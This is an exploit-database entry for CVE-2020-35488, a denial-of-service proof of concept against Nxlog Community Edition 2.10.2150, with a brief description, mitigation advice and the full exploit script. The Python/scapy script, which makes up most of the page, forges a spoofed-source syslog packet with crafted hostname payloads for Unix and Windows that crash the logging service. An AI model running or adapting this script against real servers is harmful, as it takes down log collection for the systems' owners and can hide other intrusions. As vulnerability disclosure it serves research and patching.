Nxlog Community Edition 2.10.2150 - DoS (Poc)

vendor:

Nxlog Community Edition

by:

Guillaume PETIT

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Nxlog Community Edition

Affected Version From: 2.10.2150

Affected Version To: 2.10.2150

Patch Exists: YES

Related CWE: CVE-2020-35488

CPE: a:nxlog:nxlog_community_edition:2.10.2150

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux Debian 10, Windows Server 2019

2020

Nxlog Community Edition 2.10.2150 – DoS (Poc)

This exploit is a proof of concept for a denial of service vulnerability in Nxlog Community Edition 2.10.2150. The exploit sends a malicious syslog packet to the NXLOG server, which causes the service to crash. The malicious packet contains a priority of 30 and a message of 'Silence is golden'. The exploit can be used to target both Unix and Windows systems.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of Nxlog Community Edition.

Source

Exploit-DB raw data:

# Exploit Title: Nxlog Community Edition 2.10.2150 - DoS (Poc)
# Date: 15/12/2020
# Exploit Author: Guillaume PETIT
# Vendor Homepage: https://nxlog.co
# Software Link: https://nxlog.co/products/nxlog-community-edition/download
# Version: 2.10.2150
# Tested on: Linux Debian 10 && Windows Server 2019
# CVE: CVE-2020-35488

#!/usr/bin/python3

import sys
import time
import argparse
from scapy.all import *

def getPayload(args):
        # IF UNIX
        if (args.OS == 1):
                return "Sep 14 14:09:09 .. dhcp service[warning] 110 Silence is golden"
        # IF WINDOWS
        elif (args.OS == 2):
                return "Sep 14 14:09:09 CON dhcp service[warning] 110 Silence is golden"

        # Test
        elif (args.OS == 3):
                return "Sep 14 14:09:09 123soleil dhcp service[warning] 110 Silence is golden"

def runExploit(args,payload):
        priority = 30
        message = payload
        syslog = IP(src="192.168.1.10",dst=args.IP)/UDP(sport=666,dport=args.PORT)/Raw(load="<" + str(priority) + ">" + message)
        send(syslog,verbose=args.DEBUG)

def getArguments():
        parser = argparse.ArgumentParser(description="Go h@ck SYSLOG")
        parser.add_argument("-ip", "-IP", dest="IP", type=str, metavar="IP destination", required=True,default=1, help="IP of NXLOG server")
        parser.add_argument("-p", "-P", dest="PORT", type=int, metavar="Port destination", required=False,default=514, help="Port of NXLOG default 514")
        parser.add_argument("-os", "-OS", dest="OS", type=int, metavar="OS", default=1, required=True, help="1 : For unix payload \n 2 : For Windows Paylaod \n 3 : Just for test")
        parser.add_argument("-d", "-D", dest="DEBUG", type=int, metavar="DEBUG", default=0, required=False, help="1 : Debbug enable")
        return parser.parse_args()

def main():
        args = getArguments()
        payload = getPayload(args)
        runExploit(args,payload)
main()